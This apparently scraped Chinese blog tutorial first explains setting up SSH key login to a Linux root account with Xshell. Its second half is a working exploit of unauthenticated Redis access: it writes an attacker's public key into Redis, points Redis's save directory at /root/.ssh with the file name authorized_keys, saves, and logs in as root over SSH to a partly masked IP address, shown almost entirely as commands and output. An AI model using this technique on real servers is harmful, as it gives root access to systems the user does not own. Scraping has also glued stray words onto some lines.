使用密鑰認證機制遠程登陸Linux

密鑰認證機制

建立存放key的文件

1)建立目錄 /root/.ssh 並設置權限linux

[root@localhost ~]# mkdir /root/.ssh mkdir 命令用來建立目錄,之後會詳細介紹,暫時只瞭解便可。

[root@localhost ~]# chmod 700 /root/.ssh chmod 命令是用來修改文件屬性權限的,之後會詳細介紹。

2)建立文件 / root/.ssh/authorized_keysredis

[root@localhost ~]# vim /root/.ssh/authorized_keys

生成Key

Xshell-【新建用戶密鑰生成嚮導】,密鑰類型選擇RSA,密鑰長度選擇2048位,生成密鑰名稱,加密的密碼。shell

複製生成的公鑰到遠程linux裏面 /root/.ssh/authorized_keys 文件中。若是沒有.ssh目錄,就自行創建,並更改目錄權限爲700。粘貼公鑰的內容,保存退出。vim

就能夠利用密鑰登陸了服務器

漏洞場景-redis未受權訪問漏洞

1)本地生成祕鑰

root@XXX:~# ssh-keygen  -t rsa

2)將公鑰寫入一個文件

root@XXX:~# cd /root/.ssh/

root@XXX:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

3)鏈接redis寫入文件

root@XXX:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit

OK
root@XXX:~/.ssh# redis-cli  -h 210.73.90.xxx

210.73.90.xxx:6379> config set dir /root/.ssh/
OK
(1.39s)
210.73.90.xxx:6379> CONFIG GET dir
1) "dir"
2) "/root/.ssh"
210.73.90.xxx:6379> config set dbfilename "authorized_keys"
OK
(1.03s)
210.73.90.xxx:6379> SAVE
OK
210.73.90.xxx:6379> exit
root@XXX:~/.ssh# ssh

4)鏈接服務器
root@XXX:~/.ssh# ssh -i id_rsa root@210.73.90.xxx
相關文章
相關標籤/搜索